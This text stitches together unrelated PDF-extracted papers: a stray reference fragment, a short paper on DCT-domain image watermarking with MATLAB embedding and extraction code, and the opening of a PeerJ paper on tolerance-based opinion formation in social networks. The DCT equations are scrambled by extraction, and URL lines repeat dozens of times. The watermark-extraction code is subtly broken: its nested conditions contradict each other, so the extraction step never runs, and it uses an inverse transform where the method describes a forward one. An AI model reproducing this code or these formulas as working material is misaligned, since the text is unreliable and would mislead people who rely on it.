Yang, Ching Teo, Hal Daume III, and Yiannis Aloimonos. 2011. Corpus-guided sentence genera- tion of natural images. In Proceedings of the 2011 Conference on Empirical Methods in Natural Lan- guage Processing (EMNLP), pages 444–454, Edin- burgh, UK, July. 78 work_x5mcpywaavaodktsewwistrpgy ---- 38 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 A DCT Domain Image Watermarking Method Based on Matlab Wu He-Jing Department of Computer Science & Electrical Engineering, East University of Heilongjiang, Harbin, China Email: 499917928@qq.com Abstract. In the text, A method of image watermarking based on DCT (Discrete Cosine Transform) domain algorithm is proposed and verified in experiment by Matlab. The experimental result shows that the current method can achieve embedding with sound robustness and invisibility. From the experimental results, the quality of the watermarked image is almost no decline relative to the original. Keywords: DCT, watermarking, matlab, embedding 1. Introduction Along with the development of technologies about computer, network, and multimedia, the transmission of multimedia information such as music, image and video becomes more and more convenient, whereas the problem of copyright infringement has brought new opportunity for the effective protection of intellectual property. People invented a technique to hide the company logo, specific digital identifier and other information into the multimedia files for the sake of identification of ownership. Such a technique is called Digital Watermarking, which is a branch in the information hiding technology. The basic requirements are: 1) transparency, referring to that a certain amount of digital watermarking information is embedded in a digital media host, with the hidden data being imperceptible and without causing degradation to the original media; 2）robustness, referring to that the digital watermarking must be immune to the transformation applied on host media such as lossy compression, filtering and cropping, that is, the watermark information should not be lost due to some transformation applied to the host media; 3）safety, referring to that the digital watermark can resist all kinds of deliberate attack, and it is difficult to be copied or forged by others, as long as they do not know the secret key control algorithm. This paper focuses on a theme on DCT-based image digital watermark design and implementation. Improve a digital image watermarking algorithm which is based on DCT transform and Arnold scrambling. It is ensure the security of the watermarking by Arnold scrambling the original watermark information. The experimental results show that it is hiding the information of gray image, and make an experimental simulation on some common image attacks. 2. Dct Transformation Discrete Cosine Transform is based on orthogonal transform, which is one of the most commonly used linear transform in digital signal processing. It reflects the correlation properties of image signal. DCT algorithm is of moderate complexity, with medium energy consumption and has the good ability to energy compression. Thus, it is widely used in digital signal compression such as image A DCT Domain Image Watermarking Method Based on Matlab 39 compression and other fields. JPEG compression is a standard established on the basis of the DCT transform. Watermarking algorithm of JPEG compression standard has greatly enhanced the ability to resist JPEG compression based on watermark. So the DCT transform in watermark technology is very important. DCT transform decompose the image into a spectrum of different spatial frequencies ( ),F u v ,with ( ),u v known as the frequency domain coordinates. The inverse transform puts different spatial frequency components into the original image synthesis. In digital image processing often a two dimensional DCT transform is used. For a picture with the dimension M N× , the DCT transform is: 1 1 0 0 (2 1) (2 1) ( , ) ( ) ( ) ( , ) cos cos 2 2 M N x y x y F u c u c v f x y M N π π ν − − = = + + = ∑ ∑ (1) ( ) 1 0 2 1, 2, , M 1 uMc u uM  = =   = ⋅⋅⋅ −  (2) 1 0 ( ) 2 1, 2, , 1 vNc v v NN  = =   = ⋅⋅⋅ −  (3) The two dimensional inverse DCT transform formula is： N vy M ux vuFvcucyxf M u N v 2 )12( cos 2 )12( cos),()()(),( 1 0 1 0 ++ = ∑∑ − = − = ππ (4) Among them, x,y are spatial sampling values and u,v are the frequency domain sampling values. Because digital image is always measured by pixels, that is, M=N, in such cases, the two-dimensional DCT transform and inverse transform can be simplified as: 1 1 0 0 (2 1) (2 1) ( , ) ( ) ( ) ( , ) cos cos 2 2 N N x y x y F u c u c v f x y N N π π ν − − = = + + = ∑ ∑ (5) N vy N ux vuFvcucyxf N u N v 2 )12( cos 2 )12( cos),()()(),( 1 0 1 0 ++ = ∑∑ − = − = ππ 3. Discrete Cosine Transform Watermarking Embedding Algorithm Digital image watermarking algorithm that select the value of the two gray image as watermark information, choose the best one from different embedding coefficient. The vector image is 8*8 block, and the gray level digital watermark value directly embedded into the DCT transform domain vector in gray image, which realize the embedded watermarking. Specific methods are as follows: let I be the original image with the size of M N× , W is the watermark image with the size of P Q× , M and N are even times of P and Q, and the watermark W is loaded into the image I. The algorithm is divided into the following steps: 40 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 (1)I is divided into the block B with the size of ( / 8) * ( / 8)M N , and make a DCT transform; (2)By Arnold transform, B is divided into the block V with the size of (8 / ) * (8 / )P M Q N , and make a DCT transform; (3)Watermark is embedded according to the multiplicative watermarking algorithm, which put the block into the carrier image in I, and the IDCT transform is performing and get a new image with watermark. The program code is as follows: M=960; N=120; K=8; I=zeros(M,M); J=zeros(N,N); BLOCK=zeros(K,K); subplot(3,2,1); I=imread(‘lena.jpg’); I=rgb2gray(I); I=imresize(I,[960,960],’bicubic’); imwrite(I,’lena1.jpg’,’jpg’); imshow(I); title(‘original image’); subplot(3,2,2); J=imread(‘heida.jpg’); J=im2bw(J,0.4); J=imresize(J,[120,120],’bicubic’); imwrite(J,’heida2.jpg’,’jpg’); imshow(J); title(‘the original image’); for p=1:N for q=1:N x=(p-1)*K+1; y=(q-1)*K+1; A DCT Domain Image Watermarking Method Based on Matlab 41 BLOCK=I(x:x+K-1,y:y+K-1); BLOCK=dct2(BLOCK); if J(p,q)==0 a=-1; else a=1; end BLOCK=BLOCK*(1+a*0.03); BLOCK=idct2(BLOCK); I(x:x+K-1,y:y+K-1)=BLOCK; end end subplot(2,2,1); imshow(I); title(‘matermark image’); imwrite(I,’watermarked.jpg’,’jpg’); 4. Discrete Cosine Transform Watermark Extraction AlgorithmIn Set the image I as the carrier image with embedded watermark. Firstly, it need extract the watermark image from I, and the extraction process is the inverse of the embedded watermarking algorithm. (1) The image I is decomposed into the size of ( / 8) * ( / 8)M N ; (2) Make a DCT transform for each block; (3) Make each block watermark extraction process according to the multiplicative inverse algorithm ; (4) Make the IDCT transform, and a watermark image is synthesized. clear all M=960; N=120; K=8; A=imread(‘lena1.jpg’); %I=imread(‘watermarked.jpg’); %I=rgb2gray(I); 42 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 A=imresize(A,[960,960],’bicubic’); b=imread(‘watermarkedR.jpg’); for p=1:N for q=1:N x=(p-1)*K+1; y=(q-1)*K+1; BLOCK1=A(x:x+K-1,y:y+K-1); BLOCK2=b(x:x+K-1,y:y+K-1); BLOCK1=idct2(BLOCK1); BLOCK2=idct2(BLOCK2); if BLOCK1(1,1)==0 if BLOCK1(1,1)~=0 a=(BLOCK2(1,1)/BLOCK1(1,1))-1; if a<0 W(p,q)=0; else W(p,q)=1; end end end end subplot(2,2,1); imshow(W); title(‘the extracted watermark image’); imwrite(W,’w1.jpg’,’jpg’); 5. Experimental Results And Analysis In this paper, the experimental results are obtained based on MATLAB7.0 simulation. The original image uses the gray image of Lena, the watermark image is the two value image containing the words East University of Heilongjiang. A DCT Domain Image Watermarking Method Based on Matlab 43 （a）The original carrier image (b) Two value watermark image (c) The watermarking image after Figure.1 The watermark embedding test results We can see from the experimental results, the quality of the watermarked image is almost no decline relative to the original, almost invisible. Respectively, shear attacks、noise attacks、compression attacks are put on the watermarked image, and carries the watermark detection, get the following figure. (a) gray image after shear 10% (b) 10% shear watermarked image Figure.2 10% experimental results of shear (a) Gray image after shear 15% (b) 15% shear watermarked image Figure.3 15% experimental results of shear 44 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 (a) Gray image after shear 30% (b) 30% shear watermarked image Figure.4 30% experimental results of shear Table 1 normalized different shear ratio similarity coefficient From Table 1, we can see that according to the continuous change of different shear ratio, the extracted watermark image whose normalized similarity coefficient （NC）also showed different changes. According to the data in the above table and the extracted watermark image with different shear ratio, we can see that shearing off a portion of the image, but the relevant information from the original color image watermarking is still extracted. (a)Gauss joined the variance of noise image 0.02 (b)From the variance of 0.02 images extracted watermark Figure.5 Adding Gauss noise variance for experimental results of 0.02 (a)The compression factor of 70 gray image (b)From a factor of 70 images extracted watermark Figure.6 Experimental results for gray image compression factor of 70 Shear ratio 5% 10% 15% 20% 30% 50% NC 1 0.9980 0.9920 0.9880 0.9870 0.9827 A DCT Domain Image Watermarking Method Based on Matlab 45 Table 2 Different quality factor compression experimen We conducted various experiments to attack the algorithm, it is concluded that the algorithm can be well applied to copyright protection and authentication. The experiment results prove that the digital watermarking algorithm we used is a good robustness、transparency、low complexity algorithm. In a word，research on the digital watermarking technique is developed in recent years and more active. The research in this area has achieved some results, but the workload is not enough. More research is needed to obtain greater progress in this field. References [1] Hernandez J R, Amado M,Perez G F.DCT domain watermarking techniques for still images:Detector performance analysis and a new structure.IEEE Trans on Image Processing,2000,9(1):55-68. [ 2 ] A . Z . T r i k e l , G . A . R a n k i n a n d R . v a n S c h y n d e l . E l e c t r o n i c W a t e r m a r k [ C ] . I n : D i g i t a l I m a g e Computing,Technology and Applications-DICTA93, Macquarie University,1993:666-673. [3] R.G.Van Schyndel,A.Z.Tirkel and C.F.Osborne.A Digital Watermark[C]. Proceedings of IEEE International Conference on Image Processing, 1994,2:86-90. [4] Sun X M, Luo G,Huang HJ.Component-based digital watermarking of Chinese texts[C].Proceedings of the third International Conference on Information Security.Shanghai,China,2004,85:76-81. [5] P.S.Huang,C.S.Chiang, C.P.Chang.Robust Spatial Watermarking Technique for Color Images via Direct Saturation Adjustment[J]. Proceedings of IEEE:Vision, Image and Signa Processing, 2005, 152(5):561-571. [6] F.A.P.Petitcolas, R.J.Anderson and M.G.Kuhu.Information Hiding-A Survey[J].Proceedings of IEEE,1999,87(7):1062-1078. [7] G.Voyatzis and I. Pitas. The Use of Watermarks in the Protection of Digital Multimedia Products[J]. Proceedings of the IEEE, 1999, 87(7):1197-1207. [8] Nikolaidis N, Pitas I.Copyright Protection of Images Using Robust Digital Signatures[C].IEEE International Conference on Acoustics, Speech,and Signal Processing.USA,1996:2168-2171. [ 9 ] J . M . A c k e n . H o w W a t e r m a r k i n g A d d s V a l u e t o D i g i t a l C o n t e n t [ J ] . C o m m u n i c a t i o n s o f t h e ACM,1998,41(7):74-77. Quality factor(%) 90 80 70 60 50 40 30 NC 1 1 0.9930 0.9901 0.9850 0.9432 0.9120 work_x6dykc6hezhvlnovvg2d6vmdxe ---- Tolerance-based interaction: a new model targeting opinion formation and diffusion in social networks Submitted 24 August 2015 Accepted 18 December 2015 Published 13 January 2016 Corresponding author Mihai Udrescu, mudrescu@cs.upt.ro, mudrescu@gmail.com Academic editor Filippo Menczer Additional Information and Declarations can be found on page 29 DOI 10.7717/peerj-cs.42 Copyright 2016 Topirceanu et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Tolerance-based interaction: a new model targeting opinion formation and diffusion in social networks Alexandru Topirceanu1, Mihai Udrescu1, Mircea Vladutiu1 and Radu Marculescu2 1 Department of Computer and Software Engineering, Politehnica University Timisoara, Timisoara, Romania 2 Department of Electrical and Computer Engineering, Carnegie Mellon University, Pittsburgh, PA, United States ABSTRACT One of the main motivations behind social network analysis is the quest for un- derstanding opinion formation and diffusion. Previous models have limitations, as they typically assume opinion interaction mechanisms based on thresholds which are either fixed or evolve according to a random process that is external to the social agent. Indeed, our empirical analysis on large real-world datasets such as Twitter, Meme Tracker, and Yelp, uncovers previously unaccounted for dynamic phenomena at population-level, namely the existence of distinct opinion formation phases and social balancing. We also reveal that a phase transition from an erratic behavior to social balancing can be triggered by network topology and by the ratio of opinion sources. Consequently, in order to build a model that properly accounts for these phenomena, we propose a new (individual-level) opinion interaction model based on tolerance. As opposed to the existing opinion interaction models, the new tol- erance model assumes that individual’s inner willingness to accept new opinions evolves over time according to basic human traits. Finally, by employing discrete event simulation on diverse social network topologies, we validate our opinion interaction model and show that, although the network size and opinion source ratio are important, the phase transition to social balancing is mainly fostered by the democratic structure of the small-world topology. Subjects Network Science and Online Social Networks, Scientific Computing and Simulation, Social Computing Keywords Social networks, Opinion diffusion, Phase transition, Discrete event simulation, Tolerance INTRODUCTION Social network analysis is crucial to better understand our society, as it can help us observe and evaluate various social behaviors at population level. In particular, understanding the social opinion dynamics and personal opinion fluctuation (Golbeck, 2013; Geven, Weesie & Van Tubergen, 2013; Valente et al., 2013) plays a major part in fields like social psychology, philosophy, politics, marketing, finances and even warfare (Easley & Kleinberg, 2010; Pastor-Satorras & Vespignani, 2001; Fonseca, 2011). Indeed, the dynamics of opinion fluctuation in a community can reflect the distribution of socially influential people across that community (Kempe, Kleinberg & Tardos, 2003; Hussain et al., 2013; Muchnik, Aral & How to cite this article Topirceanu et al. (2016), Tolerance-based interaction: a new model targeting opinion formation and diffusion in social networks. PeerJ Comput. Sci. 2:e42; DOI 10.7717/peerj-cs.42 mailto:mudrescu@cs.upt.ro mailto:mudrescu@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.42 http://dx.doi.org/10.7717/peerj-cs.42 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Taylor, 2013); this is because the social influence is the ability of individuals (agents) to influence others’ opinion in either one-on-one or group settings (Maxwell, 1993; Wang & Chen, 2003; McDonald & Wilson, 2011). Without social influence, the society would have an erratic behavior which would be hard to predict. Existing studies on opinion formation and evolution (Axelrod, 1997; Riolo, Cohen & Axelrod, 2001; Acemoglu et al., 2013; Yildiz et al., 2013; Valente et al., 2013; Hussain et al., 2013; Guille et al., 2013; Ruan et al., 2015) rely on the contagion principle of opinion prop- agation. However, such studies offer limited predictability and realism because they are generally based on opinion interaction models which use either fixed thresholds (Deffuant et al., 2000; Javarone & Squartini, 2014), or thresholds evolving according to simple prob- abilistic processes that are not driven by the internal state of the social agents (Fang, Zhang & Thalmann, 2013; Deng, Liu & Xiong, 2013). To mitigate these limitations, we reveal new dynamical features of opinion spreading. The consistent and recurring real-world observations are then explained by introducing a new social interaction model which takes into account the evolution of individual’s inner state. We finally validate the proposed model by analyzing empirical data from Yelp, Twitter and MemeTracker, and by using our opinion dynamics simulation framework—SocialSim1 (Topirceanu & Udrescu, 2014)— 1 SocialSim is available at cs.upt.ro/∼ alext/socialsim. which includes multiple complex topological models, as well as customizable opinion interaction and influence models. Consequently, our main contributions are threefold: 1. Identification of four distinct phases in opinion formation: this aspect is not entirely captured by existing models (Sznajd-Weron & Sznajd, 2000; Li et al., 2012; Acemoglu et al., 2013; Chen, Wang & Li, 2014; Guille et al., 2013; Fang, Zhang & Thalmann, 2013) although previous research (Hołyst, Kacperski & Schweitzer, 2000) has noticed that there are some stages in opinion evolution. We argue that the succession of opinion formation phases is critical to the social balancing phenomenon (i.e., the general opinion becomes stable despite constant local oscillations). We also identify a phase transition from an unstable opinion to social balancing which is related to the dynamics of opinion formation phases. 2. Modeling opinion dynamics: we propose a new graph and threshold based interaction model with stubborn agents (SA) (Acemoglu & Ozdaglar, 2011) which is able to reproduce the phenomena that we observe in real-world datasets. Inspired by social psychology, our new model assumes that individual’s willingness to accept new opinions (i.e., tolerance) changes over time according to his/her inner state. 3. Validation of the newly proposed tolerance model via our discrete-event simulator SocialSim (Topirceanu & Udrescu, 2014). The analysis we provide reveals the deep connection between social balancing and the relevant parameters of social networks such as network size, topology, and opinion source ratio (i.e., stubborn agents distribution)(Acemoglu et al., 2013); this correlates well with our empirical observations on large social networks. Taken together, these new contributions show that opinion dynamics in social networks exhibit specific patterns that depend on network size and ratio of stubborn agents (which Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 2/33 https://peerj.com/computer-science/ http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://dx.doi.org/10.7717/peerj-cs.42 we consider to be opinion sources), as well as underlying network topology. Consequently, our findings can be used to improve our understanding of opinion formation and diffusion in social networks, and predictability of social dynamics. METHODS Our empirical analysis is based on three full datasets from the SNAP online collection2 and 2 Datasets available online at: https://snap. stanford.edu/data/volumeseries.html. Yelp,3 which contain opinion fluctuation data with time information. 3 Dataset available online at: https://www. yelp.com/dataset challenge/dataset. The Yelp dataset: contains graded (1–5 stars) user reviews of American businesses, each with a timestamp. One can obtain insights on the popularity of a business at a given time. The usable information is the number of reviews at a given moment in time (interpreted as network size of individuals with an opinion), the average grade in time (the average opinion over time), and the number of votes to each review (ratio of agents with strong or “stubborn” opinions, because when an agent votes, his opinion is already made up). The dataset contains 366,715 users, 61,814 businesses and 1,569,264 reviews. Out of this data, we processed and filtered businesses with at least 100 reviews (i.e., we need a significant number of reviews for a relevant dynamical analysis). As such, we obtained 2,331 businesses for further analysis. MemeTracker and Twitter hashtags with time information from the Stanford Large Network Dataset Collection (SNAP); which contain the history (repost rate in time) of diverse, popular hashtags. We can use this data to analyze the evolution of a particular opinion in time. MemeTracker phrases are the 1,000 highest total volume phrases among 343 million phrases collected within 2008–2009. Twitter hashtags are the 1,000 highest total volume hashtags among 6 million hashtags from Jun–Dec 2009. We filtered the Twitter and MemeTracker data so that only the memes or hashtags which can be related to opinions remain, e.g., we have excluded those related to rare events like natural disasters. As such, we rendered a number of 500 re-tweets and 500 hashtags for further processing. Discrete simulation methodology We test and validate our new opinion interaction model based on tolerance with the Java-based opinion dynamics simulator SocialSim (Topirceanu & Udrescu, 2014). Like any discrete event simulation, we define the salient properties of the experimental setup which was used to obtain the simulation results. Events are synchronized by the simulation clock; we call the period of this clock a simulation day. One day is a simulation period in which agents can interact with their neighbors. However, an agent does not inter- act daily; in fact, each agent picks a random number of days to be inactive after each active day. In our simulation, we use a random timeout interval between 1 day and 50 days. Only after this time has elapsed, will an agent interact again with one random neighbor. After that interaction, the agent will again choose to be inactive for a random period of days. RESULTS By analyzing data on opinion evolution using Twitter and MemeTracker hashtags, as well as user reviews and votes for local businesses from Yelp, we identify unique temporal patterns in all these datasets. When defining phases of opinion dynamics, we are tracking Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 3/33 https://peerj.com/computer-science/ https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset http://dx.doi.org/10.7717/peerj-cs.42 the opinion change of the social networks, denoted as ω. For Yelp there is a clear link between the opinion state of the participants (denoted as s) and the number of stars awarded by the users. We also assume that Yelp users are agents in a social network with a typical structure; this underlying social network influences opinion dynamics in Yelp. As such, opinion change is simply the variation in time of the stars awarded by users: ω = s(t) − s(t − 1). For the Twitter and MemeTracker datasets, we interpret the number of replies as a proxy for opinion strength, e.g., more replies indicate a stronger opinion. When previously unopinionated people reply or re-tweet, they do so because they have formed a clear opinion on a particular subject (say, reflected in a hashtag) and they feel the need to express it publicly. As such, the assumption is that we can interpret the change in the number of people that retweet or reply to a hashtag as representing the opinion change ω. Opinion formation phases and social balancing Using the Yelp context, we explain how the opinion formation phases (I-initiation, F-fusion, T-tolerance and T-intolerance) are detected. For each business, we have automatically detected all spikes in the number of total votes (interpreted as opinion sources which never change their state, or stubborn agents SA) and have corroborated these with the point at which the state (average stars) has a variation of less than 1 star between maximum and minimum stars awarded. The reason behind considering the variation interval is that 1 star is the psychological threshold represented by the unit of measurement. Using an algorithmic explanation, we describe the pseudocode for detecting three points of interest—A (start of convergence of state), B (spike in SA concentration just before the convergence of state), C (spike in opinion change just after the spike in SA). find tB so that: maximum (s(k))-minimum(s(k))< 1 for all tB ≤ k < tmax assign B(tB, s(tB)) Algorithm 1: Detecting B: start of convergence in stars on OX-axis find spike[ ] := list of all local maximums in the number of total votes find spike[tA] so that: tA < tB (last spike before tB) assign A(tA, SA(tA)) Algorithm 2: Detecting A: spike in SA just before convergence of stars find spike[ ] := list of all local maximums in the opinion change find spike[tC ] so that: tB < tC (first spike after tB) assign C(tC, ω(tC)) Algorithm 3: Detecting C: spike in opinion change just after spike in SA Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 4/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 By automatically performing this methodology on all 2,331 businesses, we find that the average distance between the closest spike on the time axis OX (point A in the example from Fig. 1) which occurred before the convergence of stars (i.e., point B in Fig. 1, where the variation of awarded stars becomes lower than 1 star) is dconv = 4.131 time units. Distance dconv is relatively small with respect to the observation interval of 100 time units or days, suggesting the fact that spikes in SA trigger a (shortly delayed) convergence of stars. Further, we show that the spike in SA (point A) also triggers a maximum spike in the opinion change (point C). By running this methodology on all businesses, we obtain an average distance between the spike in SA and maximum spike in opinion change of dfusion = 4.828 time units. These statistical results support the fact that spikes in SA trigger a maximum spike in opinion change. Moreover, when we corroborate the average delays between the spike in SA and spikes in stars and opinion change, namely 4.131 and 4.828 time units, we can conclude that the convergence of opinion and the fusion phase are distanced, on average, by only dcorr = 0.697 time units. Backed up by this data, we can admit that the convergence of opinion (point B) and the triggering of the fusion phase (point C) are closely correlated. Apart from the above statistical analysis, in order to improve the readability of our insight, we also present an illustrative example. As such, in Fig. 1, the phase transition happens at OX = 28 (point A) as the spike in the total votes (green line) coincides with a delayed stabilization (point B at OX = 33) of the average stars awarded (blue line). The triggered spike in opinion change is marked with point C (at OX = 32). We also extend our interpretation of Yelp dynamics in terms of opinion change ω by presenting some relevant examples from Twitter and MemeTracker datasets. Figure 2 illustrates a few cases of memes that can be related to users opinion about, for instance, Beyonce’s song (“single ladies put a ring on it”), a movie (“where the wild things are”), or the significance of elections outcome (#IranElections). Inspired by a similar approach on Twitter data (Lehmann et al., 2012), we have conducted a statistical analysis on all three datasets. Using all datasets from Twitter (1,000 hashtags), MemeTracker (1,000 keywords) and Yelp (2,331 businesses) we have algorithmically detected the following characteristic phases in the opinion dynamics: 1. Fusion (2nd phase) is the spike centered around the previously detected point C(tC,ω(tC)) with tC being the time projection and ω(tC) the corresponding opinion change of point C. For convenience, we will refer to the local spike in opinion change ω(tC) as fs (fusion spike). 2. Initiation (1st phase): starting from time k = 0 (on OX-axis), find 0 ≤ k < tC so that ω(k) < 0.5 · fs AND ω(k + 1) > 0.5 · fs. In other words, time k represents the first point at which the opinion change ω exceeds 50% of the fusion spike fs. We have used this threshold value because it represents the half amplitude of the fusion phase, which it precedes. 3. Intolerance (4th phase): starting from time k = tmax (the highest registered time on the OY-axis), find tC < k < tmax so that ω(k) < 0.1 · fs AND ω(k − 1) > 0.1 · fs. In Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 5/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 1 Representative example for the evolution of reviews count and reviews votes for a popular businesses on Yelp. (A) The ratio of review votes with respect to the review count, represented with the green line, is interpreted as stubborn agent SA (or opinion source) concentration. (B) The average user defined popularity of the respective business over the same period of time represents the state of the social network. (C) The variation of the stars (blue) is represented with orange and it is interpreted as the participants opinion change ω. Point A depicts the SA concentration which triggers the delayed convergence in opinion (point B), and spike in opinion change (point C). In this example we have A(OX = 28), B(OX = 33), C(OX = 32), d1 = 5, d2 = 4. Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 6/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 2 Evolution of replies/retweets (opinion change ω) for some representative hashtags containing user-expressed opinion from: (A) Meme- Tracker. Both tags 1 and 2 exhibit the fusion phase (F) (opinion spike), then they slowly converge towards intolerance (T). Tag 1 exhibits a second spike after the F phase, then enters the intolerance phase. (B) Twitter. Tag 1 exhibits the fusion phase F (first opinion spike), then oscillates during the tolerance phase (T) keeping social balance. Tag 2 shows an example of convergence towards the intolerance phase, as social balancing does not occur. other words, time k represents the first point, from end to beginning of time, at which ω exceeds 10% of the fusion spike. We consider that a social network reaches intolerance if tolerance θ < 0.1, so we use the 10% threshold for opinion change. Any higher than 10%, and opinion change is still in the tolerance phase, any lower, and opinion change is likely to converge towards 0. 4. Tolerance (3rd phase): starting from time k = tC + 1 (start of social balance), find tC < k < tmax so that ω(k) > 0.1 · fs AND ω(k + 1) < 0.1 · fs (end of social balance). In other words, time k represents the point at which ω decreases below the 10% threshold which we consider a transition into the intolerance phase. Figure 2 displays the popularity of two hashtags on MemeTracker and Twitter, expressed as posts/time evolution (posts are replies and tweets). Based on the observed fluctuations, Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 7/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 we identify the following phases in opinion formation: an initiation phase (I) when new opinions are injected into the social network and the number of replies starts to increase rapidly; a fusion phase (F) when the opinion dynamics reaches a maximum and different opinions start to collide; a tolerance phase (T) which represents a fluctuating yet convergent behavior; and, occasionally, an intolerance phase (T) when the fluctuations of opinion decrease and converge towards zero. Based on network topology and/or ratio of opinion sources, the diffusion process may reach the fourth phase of intolerance. Opinion sources, or stubborn agents (Acemoglu, Ozdaglar & Yildiz, 2011; Acemoglu et al., 2013), are agents within the social network (i.e., Twitter or Yelp users) who try to instill a certain opinion by influencing their peers; they are represented by those people within the network who hold strong opinions that do not change over time. The concentration of opinion sources is expressed as their ratio relative to the entire population. Additionally, the analysis of Twitter and MemeTracker results in Fig. 2 shows that all tags exhibit a clear F phase (first spike). In Fig. 2B, tag 2 converges towards intolerance (T phase), while tag 1 enters a balanced oscillation (T phase) which supports the empirical observation of a phenomenon that we call social balancing, i.e., oscillations at microscopic scale of individuals opinion become stable and predictable at the macroscopic scale of the 